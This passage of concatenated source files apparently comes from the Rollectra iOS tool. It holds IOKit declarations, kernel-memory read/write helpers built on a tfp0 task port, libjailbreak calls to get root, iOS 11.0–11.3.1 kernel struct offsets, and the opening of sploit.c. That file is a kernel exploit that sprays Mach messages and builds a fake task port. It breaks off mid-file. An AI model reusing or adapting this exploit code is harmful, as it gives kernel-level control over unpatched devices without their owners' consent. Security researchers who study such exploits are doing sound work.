kIORegistryIterateRecursively = 0x00000001U, 27 | kIORegistryIterateParents = 0x00000002U, 28 | }; 29 | 30 | enum 31 | { 32 | kOSSerializeDictionary = 0x01000000U, 33 | kOSSerializeArray = 0x02000000U, 34 | kOSSerializeSet = 0x03000000U, 35 | kOSSerializeNumber = 0x04000000U, 36 | kOSSerializeSymbol = 0x08000000U, 37 | kOSSerializeString = 0x09000000U, 38 | kOSSerializeData = 0x0a000000U, 39 | kOSSerializeBoolean = 0x0b000000U, 40 | kOSSerializeObject = 0x0c000000U, 41 | 42 | kOSSerializeTypeMask = 0x7F000000U, 43 | kOSSerializeDataMask = 0x00FFFFFFU, 44 | 45 | kOSSerializeEndCollection = 0x80000000U, 46 | 47 | kOSSerializeMagic = 0x000000d3U, 48 | }; 49 | 50 | extern const mach_port_t kIOMasterPortDefault; 51 | 52 | CF_RETURNS_RETAINED CFDataRef IOCFSerialize(CFTypeRef object, CFOptionFlags options); 53 | CFTypeRef IOCFUnserializeWithSize(const char *buf, size_t len, CFAllocatorRef allocator, CFOptionFlags options, CFStringRef *err); 54 | 55 | kern_return_t IOObjectRetain(io_object_t object); 56 | kern_return_t IOObjectRelease(io_object_t object); 57 | boolean_t IOObjectConformsTo(io_object_t object, const io_name_t name); 58 | uint32_t IOObjectGetKernelRetainCount(io_object_t object); 59 | kern_return_t IOObjectGetClass(io_object_t object, io_name_t name); 60 | CFStringRef IOObjectCopyClass(io_object_t object); 61 | CFStringRef IOObjectCopySuperclassForClass(CFStringRef name); 62 | CFStringRef IOObjectCopyBundleIdentifierForClass(CFStringRef name); 63 | 64 | io_registry_entry_t IORegistryGetRootEntry(mach_port_t master); 65 | kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name); 66 | kern_return_t IORegistryEntryGetRegistryEntryID(io_registry_entry_t entry, uint64_t *entryID); 67 | kern_return_t IORegistryEntryGetPath(io_registry_entry_t entry, const io_name_t plane, io_string_t path); 68 | kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t name, io_struct_inband_t buffer, uint32_t *size); 69 | kern_return_t IORegistryEntryCreateCFProperties(io_registry_entry_t entry, CFMutableDictionaryRef *properties, CFAllocatorRef allocator, uint32_t options); 70 | CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options); 71 | kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties); 72 | 73 | kern_return_t IORegistryCreateIterator(mach_port_t master, const io_name_t plane, uint32_t options, io_iterator_t *it); 74 | kern_return_t IORegistryEntryCreateIterator(io_registry_entry_t entry, const io_name_t plane, uint32_t options, io_iterator_t *it); 75 | kern_return_t IORegistryEntryGetChildIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it); 76 | kern_return_t IORegistryEntryGetParentIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it); 77 | io_object_t IOIteratorNext(io_iterator_t it); 78 | boolean_t IOIteratorIsValid(io_iterator_t it); 79 | void IOIteratorReset(io_iterator_t it); 80 | 81 | CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED; 82 | CFMutableDictionaryRef IOServiceNameMatching(const char *name) CF_RETURNS_RETAINED; 83 | io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT); 84 | kern_return_t IOServiceGetMatchingServices(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT, io_iterator_t *it); 85 | kern_return_t _IOServiceGetAuthorizationID(io_service_t service, uint64_t *authID); 86 | kern_return_t _IOServiceSetAuthorizationID(io_service_t service, uint64_t authID); 87 | kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client); 88 | kern_return_t IOServiceClose(io_connect_t client); 89 | kern_return_t IOCloseConnection(io_connect_t client); 90 | kern_return_t IOConnectAddRef(io_connect_t client); 91 | kern_return_t IOConnectRelease(io_connect_t client); 92 | kern_return_t IOConnectGetService(io_connect_t client, io_service_t *service); 93 | kern_return_t IOConnectAddClient(io_connect_t client, io_connect_t other); 94 | kern_return_t IOConnectSetNotificationPort(io_connect_t client, uint32_t type, mach_port_t port, uintptr_t ref); 95 | kern_return_t IOConnectMapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t *addr, mach_vm_size_t *size, uint32_t options); 96 | kern_return_t IOConnectUnmapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t addr); 97 | kern_return_t IOConnectSetCFProperties(io_connect_t client, CFTypeRef properties); 98 | kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt); 99 | kern_return_t IOConnectCallScalarMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt); 100 | kern_return_t IOConnectCallStructMethod(io_connect_t client, uint32_t selector, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt); 101 | kern_return_t IOConnectCallAsyncMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt); 102 | kern_return_t IOConnectCallAsyncScalarMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt); 103 | kern_return_t IOConnectCallAsyncStructMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt); 104 | kern_return_t IOConnectTrap6(io_connect_t client, uint32_t index, uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d, uintptr_t e, uintptr_t f); 105 | io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path); 106 | 107 | #endif 108 | -------------------------------------------------------------------------------- /Rollectra/kmem.c: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "kmem.h" 8 | 9 | 10 | mach_port_t tfp0 = MACH_PORT_NULL; 11 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0) { 12 | tfp0 = fake_tfp0; 13 | } 14 | 15 | void wk32(uint64_t kaddr, uint32_t val) { 16 | if (tfp0 == MACH_PORT_NULL) { 17 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 18 | sleep(3); 19 | return; 20 | } 21 | 22 | kern_return_t err; 23 | err = mach_vm_write(tfp0, 24 | (mach_vm_address_t)kaddr, 25 | (vm_offset_t)&val, 26 | (mach_msg_type_number_t)sizeof(uint32_t)); 27 | 28 | if (err != KERN_SUCCESS) { 29 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 30 | return; 31 | } 32 | } 33 | 34 | void wk64(uint64_t kaddr, uint64_t val) { 35 | uint32_t lower = (uint32_t)(val & 0xffffffff); 36 | uint32_t higher = (uint32_t)(val >> 32); 37 | wk32(kaddr, lower); 38 | wk32(kaddr+4, higher); 39 | } 40 | 41 | uint32_t rk32(uint64_t kaddr) { 42 | kern_return_t err; 43 | uint32_t val = 0; 44 | mach_vm_size_t outsize = 0; 45 | err = mach_vm_read_overwrite(tfp0, 46 | (mach_vm_address_t)kaddr, 47 | (mach_vm_size_t)sizeof(uint32_t), 48 | (mach_vm_address_t)&val, 49 | &outsize); 50 | if (err != KERN_SUCCESS){ 51 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 52 | sleep(3); 53 | return 0; 54 | } 55 | 56 | if (outsize != sizeof(uint32_t)){ 57 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 58 | sleep(3); 59 | return 0; 60 | } 61 | return val; 62 | } 63 | 64 | uint64_t rk64(uint64_t kaddr) { 65 | uint64_t lower = rk32(kaddr); 66 | uint64_t higher = rk32(kaddr+4); 67 | uint64_t full = ((higher<<32) | lower); 68 | return full; 69 | } 70 | #endif /* WANT_CYDIA */ 71 | 72 | -------------------------------------------------------------------------------- /Rollectra/kmem.h: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #ifndef kmem_h 3 | #define kmem_h 4 | 5 | #include 6 | 7 | kern_return_t mach_vm_read( 8 | vm_map_t target_task, 9 | mach_vm_address_t address, 10 | mach_vm_size_t size, 11 | vm_offset_t *data, 12 | mach_msg_type_number_t *dataCnt); 13 | 14 | kern_return_t mach_vm_write( 15 | vm_map_t target_task, 16 | mach_vm_address_t address, 17 | vm_offset_t data, 18 | mach_msg_type_number_t dataCnt); 19 | 20 | kern_return_t mach_vm_read_overwrite( 21 | vm_map_t target_task, 22 | mach_vm_address_t address, 23 | mach_vm_size_t size, 24 | mach_vm_address_t data, 25 | mach_vm_size_t *outsize); 26 | 27 | extern mach_port_t tfp0; 28 | 29 | uint32_t rk32(uint64_t kaddr); 30 | uint64_t rk64(uint64_t kaddr); 31 | 32 | void wk32(uint64_t kaddr, uint32_t val); 33 | void wk64(uint64_t kaddr, uint64_t val); 34 | 35 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0); 36 | 37 | #endif 38 | #endif /* WANT_CYDIA */ 39 | 40 | -------------------------------------------------------------------------------- /Rollectra/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #include 10 | #import 11 | #import "AppDelegate.h" 12 | 13 | #define LOG_FILE "/tmp/rollectra.log" 14 | 15 | #ifdef WANT_CYDIA 16 | /* Set platform binary flag */ 17 | #define FLAG_PLATFORMIZE (1 << 1) 18 | 19 | void patch_setuidandplatformize() { 20 | void* handle = dlopen("/usr/lib/libjailbreak.dylib", RTLD_LAZY); 21 | if (!handle) return; 22 | 23 | // Reset errors 24 | dlerror(); 25 | 26 | typedef void (*fix_setuid_prt_t)(pid_t pid); 27 | fix_setuid_prt_t setuidptr = (fix_setuid_prt_t)dlsym(handle, "jb_oneshot_fix_setuid_now"); 28 | 29 | typedef void (*fix_entitle_prt_t)(pid_t pid, uint32_t what); 30 | fix_entitle_prt_t entitleptr = (fix_entitle_prt_t)dlsym(handle, "jb_oneshot_entitle_now"); 31 | 32 | setuidptr(getpid()); 33 | 34 | setuid(0); 35 | 36 | const char *dlsym_error = dlerror(); 37 | if (dlsym_error) { 38 | return; 39 | } 40 | 41 | entitleptr(getpid(), FLAG_PLATFORMIZE); 42 | } 43 | #endif /* !WANT_CYDIA */ 44 | 45 | int main(int argc, char * argv[]) { 46 | #ifdef WANT_CYDIA 47 | freopen(LOG_FILE, "a+", stderr); \ 48 | freopen(LOG_FILE, "a+", stdout); \ 49 | setbuf(stdout, NULL); \ 50 | setbuf(stderr, NULL);\ 51 | patch_setuidandplatformize(); 52 | setuid(0); 53 | #endif /* !WANT_CYDIA */ 54 | @autoreleasepool { 55 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /Rollectra/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #ifndef offsets_h 3 | #define offsets_h 4 | 5 | enum kstruct_offset { 6 | /* struct task */ 7 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 8 | KSTRUCT_OFFSET_TASK_REF_COUNT, 9 | KSTRUCT_OFFSET_TASK_ACTIVE, 10 | KSTRUCT_OFFSET_TASK_VM_MAP, 11 | KSTRUCT_OFFSET_TASK_NEXT, 12 | KSTRUCT_OFFSET_TASK_PREV, 13 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 14 | KSTRUCT_OFFSET_TASK_BSD_INFO, 15 | 16 | /* struct ipc_port */ 17 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 18 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 19 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 20 | KSTRUCT_OFFSET_IPC_PORT_SET_ID, 21 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT, 22 | KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV, 23 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 24 | KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME, 25 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 26 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 27 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 28 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 29 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 30 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 31 | 32 | /* struct proc */ 33 | KSTRUCT_OFFSET_PROC_PID, 34 | KSTRUCT_OFFSET_PROC_P_FD, 35 | 36 | /* struct filedesc */ 37 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 38 | 39 | /* struct fileproc */ 40 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 41 | 42 | /* struct fileglob */ 43 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 44 | 45 | /* struct socket */ 46 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 47 | 48 | /* struct pipe */ 49 | KSTRUCT_OFFSET_PIPE_BUFFER, 50 | 51 | /* struct ipc_space */ 52 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 53 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 54 | 55 | KFREE_ADDR_OFFSET, 56 | }; 57 | 58 | int koffset(enum kstruct_offset offset); 59 | void offsets_init(void); 60 | 61 | #endif 62 | #endif /* WANT_CYDIA */ 63 | 64 | -------------------------------------------------------------------------------- /Rollectra/offsets.m: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #import 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "offsets.h" 11 | 12 | int* offsets = NULL; 13 | 14 | int kstruct_offsets[] = { 15 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 16 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 17 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 18 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 19 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 20 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 21 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 22 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 23 | 24 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 25 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 26 | 0x10, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_FLAGS, 27 | 0x18, // KSTRUCT_OFFSET_IPC_PORT_SET_ID, 28 | 0x30, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_NEXT 29 | 0x38, // KSTRUCT_OFFSET_IPC_PORT_WAITQ_PREV 30 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 31 | 0x4c, // KSTRUCT_OFFSET_IPC_PORT_RECEIVER_NAME 32 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 33 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 34 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 35 | 0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 36 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 37 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 38 | 39 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 40 | 0x108, // KSTRUCT_OFFSET_PROC_P_FD 41 | 42 | 0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES 43 | 44 | 0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB 45 | 46 | 0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA 47 | 48 | 0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB 49 | 50 | 0x10, // KSTRUCT_OFFSET_PIPE_BUFFER 51 | 52 | 0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE 53 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 54 | 55 | 0x6c, // KFREE_ADDR_OFFSET 56 | }; 57 | 58 | 59 | int koffset(enum kstruct_offset offset) { 60 | if (offsets == NULL) { 61 | printf("need to call offsets_init() prior to querying offsets\n"); 62 | return 0; 63 | } 64 | return offsets[offset]; 65 | } 66 | 67 | 68 | void offsets_init() { 69 | if (@available(iOS 11.4, *)) { 70 | NSDictionary *systemVersionPlist = [[NSDictionary alloc] initWithContentsOfFile:@"/System/Library/CoreServices/SystemVersion.plist"]; 71 | NSString *ProductBuildVersion = systemVersionPlist[@"ProductBuildVersion"]; 72 | if ([ProductBuildVersion rangeOfString:@"15F5037c"].location != NSNotFound || [ProductBuildVersion rangeOfString:@"15F5049c"].location != NSNotFound || [ProductBuildVersion rangeOfString:@"15F5061e"].location != NSNotFound) { 73 | printf("offsets selected for iOS 11.0 to 11.3.1\n"); 74 | offsets = kstruct_offsets; 75 | } else { 76 | printf("this bug is patched in iOS 11.4 and above\n"); 77 | exit(EXIT_FAILURE); 78 | } 79 | } else if (@available(iOS 11.0, *)) { 80 | printf("offsets selected for iOS 11.0 to 11.3.1\n"); 81 | offsets = kstruct_offsets; 82 | } else { 83 | printf("iOS version too low, 11.0 required\n"); 84 | exit(EXIT_FAILURE); 85 | } 86 | } 87 | #endif /* WANT_CYDIA */ 88 | 89 | -------------------------------------------------------------------------------- /Rollectra/qilin.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/qilin.o -------------------------------------------------------------------------------- /Rollectra/sploit.c: -------------------------------------------------------------------------------- 1 | #ifndef WANT_CYDIA 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include 14 | 15 | #include "sploit.h" 16 | #include "offsets.h" 17 | #include "kmem.h" 18 | 19 | 20 | void increase_limits() { 21 | struct rlimit lim = {0}; 22 | int err = getrlimit(RLIMIT_NOFILE, &lim); 23 | if (err != 0) { 24 | printf("failed to get limits\n"); 25 | } 26 | printf("rlim.cur: %lld\n", lim.rlim_cur); 27 | printf("rlim.max: %lld\n", lim.rlim_max); 28 | 29 | lim.rlim_cur = 10240; 30 | 31 | err = setrlimit(RLIMIT_NOFILE, &lim); 32 | if (err != 0) { 33 | printf("failed to set limits\n"); 34 | } 35 | 36 | lim.rlim_cur = 0; 37 | lim.rlim_max = 0; 38 | err = getrlimit(RLIMIT_NOFILE, &lim); 39 | if (err != 0) { 40 | printf("failed to get limits\n"); 41 | } 42 | printf("rlim.cur: %lld\n", lim.rlim_cur); 43 | printf("rlim.max: %lld\n", lim.rlim_max); 44 | 45 | } 46 | 47 | #define IO_BITS_ACTIVE 0x80000000 48 | #define IKOT_TASK 2 49 | #define IKOT_NONE 0 50 | 51 | void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver, uint64_t context) { 52 | // clear the region we'll use: 53 | memset(fake_port, 0, 0x500); 54 | 55 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK; 56 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references 57 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights 58 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver; 59 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = context; 60 | 61 | 62 | uint64_t fake_task_kaddr = fake_port_kaddr + 0x100; 63 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr; 64 | 65 | uint8_t* fake_task = fake_port + 0x100; 66 | 67 | // set the ref_count field of the fake task: 68 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 69 | 70 | // make sure the task is active 71 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 72 | 73 | // set the vm_map of the fake task: 74 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 75 | 76 | // set the task lock type of the fake task's lock: 77 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 78 | 79 | // set the bsd_info pointer to be 0x10 bytes before the desired initial read: 80 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10; 81 | } 82 | 83 | int message_size_for_kalloc_size(int kalloc_size) { 84 | return ((3*kalloc_size)/4) - 0x74; 85 | } 86 | 87 | 88 | #define N_EARLY_PORTS 80000 89 | mach_port_t early_ports[N_EARLY_PORTS+20000]; 90 | int next_early_port = 0; 91 | 92 | void alloc_early_ports() { 93 | for (int i = 0; i < N_EARLY_PORTS; i++) { 94 | kern_return_t err; 95 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &early_ports[i]); 96 | if (err != KERN_SUCCESS) { 97 | printf("mach_port_allocate failed to allocate a new port for early_ports (%d)\n", i); 98 | } 99 | } 100 | next_early_port = N_EARLY_PORTS-1; 101 | } 102 | 103 | mach_port_t steal_early_port() { 104 | if (next_early_port == 0) { 105 | printf("out of early ports\n"); 106 | sleep(100); 107 | } 108 | mach_port_t p = early_ports[next_early_port]; 109 | next_early_port--; 110 | //early_ports[next_early_port--] = MACH_PORT_NULL; 111 | return p; 112 | } 113 | 114 | void dump_early_ports(){ 115 | for (int i = 0; i < N_EARLY_PORTS; i++) { 116 | printf("EARLY %d %08x\n", i, early_ports[i]); 117 | } 118 | } 119 | 120 | void clear_early_ports() { 121 | for (int i = 0; i < next_early_port; i++) { 122 | mach_port_destroy(mach_task_self(), early_ports[i]); 123 | } 124 | } 125 | 126 | struct kalloc_16_send_msg { 127 | mach_msg_header_t hdr; 128 | mach_msg_body_t body; 129 | mach_msg_ool_ports_descriptor_t ool_ports; 130 | uint8_t pad[0x200]; 131 | }; 132 | 133 | mach_port_t kalloc_16() { 134 | kern_return_t err; 135 | // take an early port: 136 | mach_port_t port = steal_early_port(); 137 | 138 | // insert a send right: 139 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 140 | 141 | uint32_t msg_size = message_size_for_kalloc_size(0x110); 142 | // send a message with two OOL NULL ports; these will end up in a kalloc.16: 143 | struct kalloc_16_send_msg kalloc_msg = {0}; 144 | 145 | kalloc_msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 146 | kalloc_msg.hdr.msgh_size = msg_size; //sizeof(struct kalloc_16_send_msg); 147 | kalloc_msg.hdr.msgh_remote_port = port; 148 | kalloc_msg.hdr.msgh_local_port = MACH_PORT_NULL; 149 | kalloc_msg.hdr.msgh_id = 0x41414141; 150 | 151 | kalloc_msg.body.msgh_descriptor_count = 1; 152 | 153 | mach_port_t ool_ports[2] = {0xffffffff, 0xffffffff}; 154 | 155 | kalloc_msg.ool_ports.address = ool_ports; 156 | kalloc_msg.ool_ports.count = 2; 157 | kalloc_msg.ool_ports.deallocate = 0; 158 | kalloc_msg.ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND; 159 | kalloc_msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 160 | kalloc_msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY; 161 | 162 | 163 | // send it: 164 | err = mach_msg(&kalloc_msg.hdr, 165 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 166 | (mach_msg_size_t)msg_size,//sizeof(struct kalloc_16_send_msg), 167 | 0, 168 | MACH_PORT_NULL, 169 | MACH_MSG_TIMEOUT_NONE, 170 | MACH_PORT_NULL); 171 | if (err != KERN_SUCCESS) { 172 | printf("sending kalloc.16 message failed %s\n", mach_error_string(err)); 173 | } 174 | 175 | return port; 176 | } 177 | 178 | #define N_MIDDLE_PORTS 50000 179 | mach_port_t middle_ports[N_MIDDLE_PORTS]; 180 | int next_middle_port = 0; 181 | 182 | mach_port_t alloc_middle_port() { 183 | mach_port_t port; 184 | kern_return_t err; 185 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 186 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // added 187 | if (err != KERN_SUCCESS) { 188 | printf("failed to alloc middle port\n"); 189 | } 190 | middle_ports[next_middle_port++] = port; 191 | return port; 192 | } 193 | 194 | struct ool_multi_msg { 195 | mach_msg_header_t hdr; 196 | mach_msg_body_t body; 197 | mach_msg_ool_ports_descriptor_t ool_ports[0]; 198 | }; 199 | 200 | // to free them either receive the message or destroy the port 201 | mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports) { 202 | if (messages_to_send > MACH_PORT_QLIMIT_LARGE) { 203 | printf("****************** too many messages\n"); 204 | return MACH_PORT_NULL; 205 | } 206 | 207 | kern_return_t err; 208 | mach_port_t port = MACH_PORT_NULL; 209 | 210 | if (holder_port == MACH_PORT_NULL) { 211 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 212 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 213 | 214 | if (err != KERN_SUCCESS) { 215 | printf("failed to allocate port for hold kallocs\n"); 216 | } 217 | 218 | // bump up the number of messages we can enqueue: 219 | mach_port_limits_t limits = {0}; 220 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 221 | err = mach_port_set_attributes(mach_task_self(), 222 | port, 223 | MACH_PORT_LIMITS_INFO, 224 | (mach_port_info_t)&limits, 225 | MACH_PORT_LIMITS_INFO_COUNT); 226 | if (err != KERN_SUCCESS) { 227 | printf(" [-] failed to increase queue limit\n"); 228 | exit(EXIT_FAILURE); 229 | } 230 | } else { 231 | port = holder_port; 232 | } 233 | 234 | // these are MACH_PORT_NULL 235 | mach_port_t* ports_to_send = calloc(kalloc_size/8, sizeof(mach_port_name_t)); 236 | 237 | size_t message_size = offsetof(struct ool_multi_msg, ool_ports[allocs_per_message+1]); 238 | struct ool_multi_msg* msg = malloc(message_size); 239 | 240 | memset(msg, 0, message_size); 241 | 242 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 243 | msg->hdr.msgh_size = (uint32_t) message_size; 244 | msg->hdr.msgh_remote_port = port; 245 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 246 | msg->hdr.msgh_id = 0x12340101; 247 | 248 | msg->body.msgh_descriptor_count = allocs_per_message; 249 | 250 | for (int i = 0; i < allocs_per_message; i++) { 251 | msg->ool_ports[i].address = source_ports != NULL ? source_ports : ports_to_send; 252 | msg->ool_ports[i].count = kalloc_size/8; 253 | msg->ool_ports[i].deallocate = 0; 254 | msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND; 255 | msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 256 | msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY; 257 | } 258 | 259 | for (int i = 0; i < messages_to_send; i++) { 260 | // send it: 261 | err = mach_msg(&msg->hdr, 262 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 263 | (uint32_t)message_size, 264 | 0, 265 | MACH_PORT_NULL, 266 | MACH_MSG_TIMEOUT_NONE, 267 | MACH_PORT_NULL); 268 | if (err != KERN_SUCCESS) { 269 | printf("%s\n", mach_error_string(err)); 270 | //exit(EXIT_FAILURE); 271 | } 272 | } 273 | free(ports_to_send); 274 | free(msg); 275 | 276 | return port; 277 | } 278 | 279 | uint8_t msg_buf[10000]; 280 | void discard_message(mach_port_t port) { 281 | mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf; 282 | kern_return_t err; 283 | err = mach_msg(msg, 284 | MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout 285 | 0, 286 | 10000, 287 | port, 288 | 0, 289 | 0); 290 | if (err != KERN_SUCCESS){ 291 | printf("error receiving on port: %s\n", mach_error_string(err)); 292 | } 293 | 294 | mach_msg_destroy(msg); 295 | } 296 | 297 | #include 298 | 299 | int vfs_fd = -1; 300 | struct attrlist al = {0}; 301 | size_t attrBufSize = 16; 302 | void* attrBuf = NULL; 303 | 304 | void 